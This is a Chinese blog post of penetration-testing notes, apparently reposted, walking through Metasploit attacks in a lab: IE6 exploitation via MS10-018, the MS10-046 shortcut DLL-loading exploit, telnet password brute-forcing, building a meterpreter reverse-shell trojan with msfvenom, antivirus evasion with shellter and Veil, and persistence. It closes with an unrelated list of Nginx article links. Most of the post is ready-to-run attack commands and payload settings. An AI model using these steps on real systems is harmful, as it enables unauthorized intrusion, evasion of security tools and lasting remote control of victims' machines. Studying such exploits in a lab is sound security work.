博客
关于我
[渗透笔记][漏洞复现] msf初步
阅读量:346 次
发布时间:2019-03-04

本文共 1958 字,大约阅读时间需要 6 分钟。

msf利用浏览器漏洞渗透

这里利用IE6和漏洞ms10_018

原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。

msfconsole启动msf

search ms10_018查看相关漏洞

use exploit/windows/browser/ms10_018_ie_behaviors选择相应模块
set LHOST 192.168.223.140
set URIPATH test

set PAYLOAD windows/meterpreter/reverse_tcp设置payload模块

set SRVHOST 192.168.223.140设置反弹到的ip
exploit
生成网页链接,被攻击机使用ie有浏览器漏洞访问这个链接后,kali中显示攻击成功,
sessions -l 查看会话
seesions -i id 选择id

shell命令转到被攻击机的终端中,可以进行相关操作。


msf利用快捷方式漏洞

原理: 利用系统解析后缀名的机制,恶意构造一个lnk(快捷方式)的文件,并构造一串程序代码来欺骗操作系统,的那个shell32.dll解析到这串编码的时候,会认为这个快捷方式依赖一个系统dll,并把这个dll加载到内存中,如果加载的这个dll是一个病毒,那就把病毒激活了。

这个漏洞的危害性表现在不需要执行文件,而是只要一访问,系统就会自动对它进行解析,并加载"dll"从而中招

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set PAYLPAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.88.227
set LHOST 192.168.88.227
exploit


msf对telnet爆破

原理;弱口令爆破,msf自带字典

use auxiliary/scanner/telnet/telnet_login

set RHOSTS 192.168.223.130
show options
set username jgc
set pass_file /root/myfile/pass.txt
exploit


msf监听并反弹payload

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp
set LHOST 本机ip


msf生成木马文件

原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用被攻击机打开会就会中马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe > /root/test.exe生成木马文件 (本机ip和端口)

use exploit/multi/handler进入监听模块

set payload windows/meterpreter/reverse_tcp设置反弹payload
set LHOST ip (要监听的本地IP)
set LPORT port(要监听本地端口)

当被攻击及执行木马文件后,就会在msf监听下有相应,通过shell命令可以进入shell环境。


msf木马免杀

原理: 首先生成木马文件,然后将生成的木马文件与shellter免杀工具捆绑,然后设置监听,将捆绑后的文件拷贝到被攻击系统中,双击后,发现攻击成功。

apt-get install shellter 下载shellter

cd shellter
wine shellter.exe
A
/root/test.exe
在网上找到的就是这几条命令,但是本地环境搭建时出问题了没能成功


msf持续控制

使用到veil

veil-evasion 打开veil

use 使用use模块
set LHOST 本机ip
set LPORT 1234(本机端口任意)
test 设置输出的文件名
到这里会生成免杀木马文件

把文件拷贝到xp里

进入console

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ip
set LPORT 1234
exploit

xp运行木马文件,msf中最出现反弹shell

msf中命令:run persistence -U -i 5 -r ip -p 1234

reboot xp重启
run 建立持久链接

转载地址:http://rwnh.baihongyu.com/

你可能感兴趣的文章
Nginx配置代理解决本地html进行ajax请求接口跨域问题
查看>>
nginx配置全解
查看>>
Nginx配置参数中文说明
查看>>
Nginx配置后台网关映射路径
查看>>
nginx配置域名和ip同时访问、开放多端口
查看>>
Nginx配置多个不同端口服务共用80端口
查看>>
Nginx配置好ssl,但$_SERVER[‘HTTPS‘]取不到值
查看>>
Nginx配置如何一键生成
查看>>
Nginx配置实例-动静分离实例:搭建静态资源服务器
查看>>
Nginx配置实例-反向代理实例:根据访问的路径跳转到不同端口的服务中
查看>>
Nginx配置实例-负载均衡实例:平均访问多台服务器
查看>>
Nginx配置文件nginx.conf中文详解(总结)
查看>>
nginx配置详解、端口重定向和504
查看>>
Nginx配置负载均衡到后台网关集群
查看>>
Nginx配置限流,技能拉满!
查看>>
Nginx面试三连问:Nginx如何工作?负载均衡策略有哪些?如何限流?
查看>>
Nginx:NginxConfig可视化配置工具安装
查看>>
ngModelController
查看>>
ngrok | 内网穿透,支持 HTTPS、国内访问、静态域名
查看>>
ngrok内网穿透可以实现资源共享吗?快解析更加简洁
查看>>